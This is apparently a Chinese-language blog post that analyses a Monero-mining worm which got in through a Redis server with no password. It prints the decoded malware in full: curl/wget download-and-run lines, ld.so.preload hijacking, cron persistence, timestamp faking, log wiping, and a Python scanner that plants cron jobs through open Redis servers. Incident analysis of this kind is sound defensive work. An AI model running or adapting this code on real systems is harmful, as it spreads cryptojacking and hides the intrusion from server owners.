Back
Featured image of post 针对Redis默认端口的挖矿脚本分析

针对Redis默认端口的挖矿脚本分析

起因

jpg

jpg

这被入侵的机子,就是没有设密码的Redis,被搞了一波。

跟踪记录流水账

阿里云这截图的给出的命令行参数

/bin/sh -c /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh


直接看看这个链接的内容

jane@debian:~$ curl https://pastebin.com/raw/xbY7p5Tb
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash

继续跟踪链接

curl https://pastebin.com/raw/uuYVPLXd

省略一堆被base64加密的内容

解密一下

curl https://pastebin.com/raw/uuYVPLXd | base64 -d

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function kills() {
  pkill -f sourplum
  pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg


  rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
  rm -rf /tmp/*index_bak*
  rm -rf /tmp/*httpd.conf*
  rm -rf /tmp/*httpd.conf
  rm -rf /tmp/a7b104c270


  ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmrig" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmrigDaemon" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmrigMiner" | awk '{print $2}' | xargs kill -9



  pkill -f biosetjenkins
  pkill -f AnXqV.yam
  pkill -f xmrigDaemon
  pkill -f xmrigMiner
  pkill -f xmrig
  pkill -f Loopback
  pkill -f apaceha
  pkill -f cryptonight
  pkill -f stratum
  pkill -f mixnerdx
  pkill -f performedl
  pkill -f JnKihGjn
  pkill -f irqba2anc1
  pkill -f irqba5xnc1
  pkill -f irqbnc1
  pkill -f ir29xc1
  pkill -f conns
  pkill -f irqbalance
  pkill -f crypto-pool
  pkill -f minexmr
  pkill -f XJnRj
  pkill -f NXLAi
  pkill -f BI5zj
  pkill -f askdljlqw
  pkill -f minerd
  pkill -f minergate
  pkill -f Guard.sh
  pkill -f ysaydh
  pkill -f bonns
  pkill -f donns
  pkill -f kxjd
  pkill -f Duck.sh
  pkill -f bonn.sh
  pkill -f conn.sh
  pkill -f kworker34
  pkill -f kw.sh
  pkill -f pro.sh
  pkill -f polkitd
  pkill -f acpid
  pkill -f icb5o
  pkill -f nopxi
  pkill -f irqbalanc1
  pkill -f minerd
  pkill -f i586
  pkill -f gddr
  pkill -f mstxmr
  pkill -f ddg.2011
  pkill -f wnTKYg
  pkill -f deamon
  pkill -f disk_genius
  pkill -f sourplum
  pkill -f bashx
  pkill -f bashg
  pkill -f bashe
  pkill -f bashf
  pkill -f bashh
  pkill -f XbashY
  pkill -f libapache



  rm -rf /tmp/httpd.conf
  rm -rf /tmp/conn
  rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
  rm -rf /tmp/conns
  rm -f /tmp/irq.sh
  rm -f /tmp/irqbalanc1
  rm -f /tmp/irq
  rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json


  netstat -anp | grep 69.28.55.86:443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 14444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 5.196.225.222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9



  y=$(ps aux | grep -v grep | grep kworkerds | wc -l)

  if [ ${y} -eq 0 ]; then
    netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  fi



}

function system() {
  if [ ! -f "/bin/httpdns" ]; then
    curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
    if [ ! -f "/bin/httpdns" ]; then
      wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
    fi
    sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
  fi

}

function top() {
  if [ ! -f "/usr/local/lib/libntp.so" ]; then
    curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
    if [ ! -f "/usr/local/lib/libntp.so" ]; then
      wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
    fi
  fi
  if [ ! -f "/etc/ld.so.preload" ]; then
    echo /usr/local/lib/libntp.so >/etc/ld.so.preload
  else
    sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >>/etc/ld.so.preload
  fi


  touch -acmr /bin/sh /etc/ld.so.preload
  touch -acmr /bin/sh /usr/local/lib/libjdk.so
  touch -acmr /bin/sh /usr/local/lib/libntp.so


  echo 0>/var/spool/mail/root #发邮件
  echo 0>/var/log/wtmp #登陆记录
  echo 0>/var/log/secure #身份权鉴别记录
  echo 0>/var/log/cron #cron消息记录
}

function python() {
  nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
  touch /tmp/.tmpa
}

function echocron() {
  echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
  echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
  mkdir -p /var/spool/cron/crontabs
  echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root

  touch -acmr /bin/sh /etc/cron.d/root
  touch -acmr /bin/sh /var/spool/cron/crontabs
  touch -acmr /bin/sh /var/spool/cron/root
  touch -acmr /bin/sh /var/spool/cron/crontabs/root

}

function downloadrun() {
  ps=$(netstat -anp | grep 13531 | wc -l)
  if [ ${ps} -eq 0 ]; then
    if [ ! -f "/tmp/kworkerds" ]; then
      curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
      if [ ! -f "/tmp/kworkerds" ]; then
        wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
      fi
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    else
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    fi
  fi
}

function downloadrunxm() {
  pm=$(netstat -anp | grep 13531 | wc -l)
  if [ ${pm} -eq 0 ]; then
    if [ ! -f "/bin/config.json" ]; then
      curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
      if [ ! -f "/bin/config.json" ]; then
        wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
      fi
    fi
    if [ ! -f "/bin/kworkerds" ]; then
      curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
      if [ ! -f "/bin/kworkerds" ]; then
        wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
      fi
      nohup /bin/kworkerds >/dev/null 2>&1 &
    else
      nohup /bin/kworkerds >/dev/null 2>&1 &
    fi
  fi
}

update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)

if [ ${update}x = "update"x ]; then
  rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
  echocron
else
  if [ ! -f "/tmp/.tmpa" ]; then
    rm -rf /tmp/.tmp
    python
  fi
  kills
  downloadrun
  echocron
  system
  top
  sleep 10
  port=$(netstat -anp | grep 13531 | wc -l)
  if [ ${port} -eq 0 ]; then
    downloadrunxm
  fi
fi
#
#�

function有点多,用Atom折叠下。

jpg

update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)

if [ ${update}x = "update"x ]; then
  rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
  echocron
else
  .
  .
  .
fi  

脚本执行的第一步就是根据update返回值确定是不是要更新。

现在我这个时间点去访问,是noupdate

curl https://pastebin.com/raw/C4ZhQFrH

noupdate

rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds

用脚都能够猜得出这些文件有问题,挖矿脚本需要更新的东西还能是啥子。

看看这个echocron的function干了啥

function echocron() {
  echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
  echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
  mkdir -p /var/spool/cron/crontabs
  echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root

  touch -acmr /bin/sh /etc/cron.d/root
  touch -acmr /bin/sh /var/spool/cron/crontabs
  touch -acmr /bin/sh /var/spool/cron/root
  touch -acmr /bin/sh /var/spool/cron/crontabs/root

}

这个意图就非常之明显啦,添加定时任务到系统里面,让这挖矿生生不息。

留意一下,这个获取脚本的地址,恰好不就是现在分析的这个脚本咩。

/etc/cron.d/root
/var/spool/cron/root
/var/spool/cron/crontabs
/var/spool/cron/crontabs/root

上面的文件还使用touch -acmr改掉了时间,改成跟sh一个时间,怕是防止运维用find找出来吧。


if [ ! -f "/tmp/.tmpa" ]; then
  rm -rf /tmp/.tmp
  python
fi

判断有没有/tmp/.tmpa,没有就删掉/tmp/.tmp,再调用python这个function。

怀疑.tmp对于apache有较大影响。

function python() {
  nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
  touch /tmp/.tmpa
}

这个/tmp/.tmpa,应该就是判定有没有运行过这个python脚本的了。

现在看看这个python脚本运行的是啥子

先来个base64解密

#coding: utf-8
import urllib
import base64

d= 'https://pastebin.com/raw/nYBpuAxT'
try:
    page=base64.b64decode(urllib.urlopen(d).read())
    exec(page)
except:
    pass
curl https://pastebin.com/raw/nYBpuAxT | base64 -d

实际上他要运行的脚本就是这个

#! /usr/bin/env python
#coding: utf-8

import threading
import socket
from re import findall
import httplib

IP_LIST = []

class scanner(threading.Thread):
    tlist = []
    maxthreads = 100
    evnt = threading.Event()
    lck = threading.Lock()

    def __init__(self,host):
        threading.Thread.__init__(self)
        self.host = host
    def run(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((self.host, 6379))
            s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
            s.send('config set dir /etc/cron.d\r\n')
            s.send('config set dbfilename root\r\n')
            s.send('save\r\n')
            s.close()
        except Exception:
            pass
        scanner.lck.acquire()
        scanner.tlist.remove(self)
        if len(scanner.tlist) < scanner.maxthreads:
            scanner.evnt.set()
            scanner.evnt.clear()
        scanner.lck.release()

    def newthread(host):
        scanner.lck.acquire()
        sc = scanner(host)
        scanner.tlist.append(sc)
        scanner.lck.release()
        sc.start()

    newthread = staticmethod(newthread)

def get_ip_list():
    try:
        url = 'ident.me'
        conn = httplib.HTTPConnection(url, port=80, timeout=10)
        req = conn.request(method='GET', url='/', )
        result = conn.getresponse()
        ip2 = result.read()
        ips2 = findall(r'\d+.\d+.', ip2)[0]
        for i in range(0, 255):
            ip_list1 = (ips2 + (str(i)))
            for g in range(0, 255):
                IP_LIST.append(ip_list1 + '.' + (str(g)))
    except Exception:
        pass

def runPortscan():
    get_ip_list()
    for host in IP_LIST:
        scanner.lck.acquire()
        if len(scanner.tlist) >= scanner.maxthreads:
            scanner.lck.release()
            scanner.evnt.wait()
        else:
            scanner.lck.release()
        scanner.newthread(host)
    for t in scanner.tlist:
        t.join()

if __name__ == "__main__":
    runPortscan()

粗略地看了两下,就是一个扫Redis默认端口并且传播挖矿脚本的操作。

这被入侵的机子,就是没有设密码的Redis,被搞了一波。

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((self.host, 6379))
s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /etc/cron.d\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
url = 'ident.me'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
req = conn.request(method='GET', url='/', )
result = conn.getresponse()
ip2 = result.read()
ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0, 255):
    ip_list1 = (ips2 + (str(i)))
    for g in range(0, 255):
        IP_LIST.append(ip_list1 + '.' + (str(g)))

继续往下看

kills
downloadrun
echocron
system
top
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ]; then
  downloadrunxm
fi

看看这个kills的function干了啥

开始的两行就很interesting了,先把同行的挖矿给干了。

pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg

第一行是干掉sourplum

第二行是干掉wnTKYg,ddg这个是帮他死掉后重启的。

rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270

不清楚第一行的删除有什么用,但是涉及到/boot的东西,估计都蛋疼。

后几行都是删掉了apache的备份。

最后一行,a7b104c270,这个是挖矿的。

整个kill的function看下来,都是针对于apache和挖矿恶意程序。

跟这次比较相关就下面这些

rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json

y=$(ps aux | grep -v grep | grep kworkerds | wc -l)

if [ ${y} -eq 0 ]; then
  netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
fi

从这几行基本可以判定,kworkerds这就是他的挖矿程序。

要是13531这个端口被占用,又不是这个kworkerds,就kill掉,腾出来给他挖矿用。

把后面遇到的config.json拿到这里来,就很清晰了。

"url": "stratum+tcp://xmr.f2pool.com:13531",

看看这个downloadrun的function干了啥

function downloadrun() {
  ps=$(netstat -anp | grep 13531 | wc -l)
  if [ ${ps} -eq 0 ]; then
    if [ ! -f "/tmp/kworkerds" ]; then
      curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
      if [ ! -f "/tmp/kworkerds" ]; then
        wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
      fi
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    else
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    fi
  fi
}

thyrsi.com,一个图床站。

这里稍微做了下伪装。

kworkerds下到/tmp,并且运行。

这个下载链接在国内速度真是好差,这可能就是为啥在这次入侵的机子上面找不到这个程序的问题emmm。

但是在海外下载是没有问题的。

root@659b8ee8ecf6:/# chmod 777 kworkerds
root@659b8ee8ecf6:/# ./kworkerds
[2018-09-03 18:31:58] : Autoconf L3 size detected at 3072 KB.
[2018-09-03 18:31:58] : Autoconf core count detected as 2 on Linux.
[2018-09-03 18:31:58] : Starting 1x thread, affinity: 0.
[2018-09-03 18:31:58] : Starting 1x thread, affinity: 1.
[2018-09-03 18:31:59] : Dev pool connected. Logging in...
[2018-09-03 18:32:01] : Pool logged in.

在容器上面跑了一下,确实的一个挖矿的程序。CPU一下子就上天了。

docker diff debian

C /tmp
A /tmp/.systemd-private-23024397a2adb34112feb510f90ad653.service-3vFbca
A /tmp/.systemd-private-45a30b14252fad11672e49bbbda5c08f.service-5qFboa
A /tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa
A /kworkerds

在输出的文件里面/tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa

"pool_list" :
[
	{"pool_address" : "xmr.f2pool.com:13531",
    "wallet_address" : "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.bashx",
    "rig_id" : "",
    "pool_password" : "",
    "use_nicehash" : false,
    "use_tls" : false,
    "tls_fingerprint" : "",
    "pool_weight" : 1
    },
],

这个应该是一个已经封装好挖矿程序(挖矿的地址和矿池都写好了),开箱即用。2333

哪怕没有下载后面的config.json都能够跑。



看看这个system的function干了啥

function system() {
  if [ ! -f "/bin/httpdns" ]; then
    curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
    if [ ! -f "/bin/httpdns" ]; then
      wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
    fi
    sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
  fi

}

先看看这个链接是啥玩儿

curl https://pastebin.com/raw/698D7kZU

/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash

又需要你再获取再解码,他不烦吗?

最后得到下面的内容

#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function downloadrun() {
  ps=$(netstat -anp | grep 13531 | wc -l)
  if [ ${ps} -eq 0 ]; then
    if [ ! -f "/tmp/kworkerds" ]; then
      curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
      if [ ! -f "/tmp/kworkerds" ]; then
        wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
      fi
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    else
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    fi
  fi
}

function downloadrunxm() {
  pm=$(netstat -anp | grep 13531 | wc -l)
  if [ ${pm} -eq 0 ]; then
    if [ ! -f "/bin/config.json" ]; then
      curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
      if [ ! -f "/bin/config.json" ]; then
        wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
      fi
    fi
    if [ ! -f "/bin/kworkerds" ]; then
      curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
      if [ ! -f "/bin/kworkerds" ]; then
        wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
      fi
      nohup /bin/kworkerds >/dev/null 2>&1 &
    else
      nohup /bin/kworkerds >/dev/null 2>&1 &
    fi
  fi
}

function init() {
  if [ ! -f "/usr/sbin/kworker" ]; then
    curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
    if [ ! -f "/usr/sbin/kworker" ]; then
      wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
    fi
  fi
  if [ ! -f "/etc/init.d/kworker" ]; then
    curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
    if [ ! -f "/etc/init.d/kworker" ]; then
      wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
    fi
  fi
  chkconfig --add kworker
}

function echocron() {
  echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
  echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
  mkdir -p /var/spool/cron/crontabs
  echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
}

update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
if [ ${update}x = "update"x ]; then
  rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
  echocron
else
  downloadrun
  init
  echocron
  sleep 10
  port=$(netstat -anp | grep 13531 | wc -l)
  if [ ${port} -eq 0 ]; then
    downloadrunxm
  fi
fi
#
#�

这脚本不得不说,真的有毒。

sh作为解析器,写函数的时候,前面还加function

重命名成httpdns丢到bin目录,还给了执行权限。

在crontab里面增加了定时任务。

comments powered by Disqus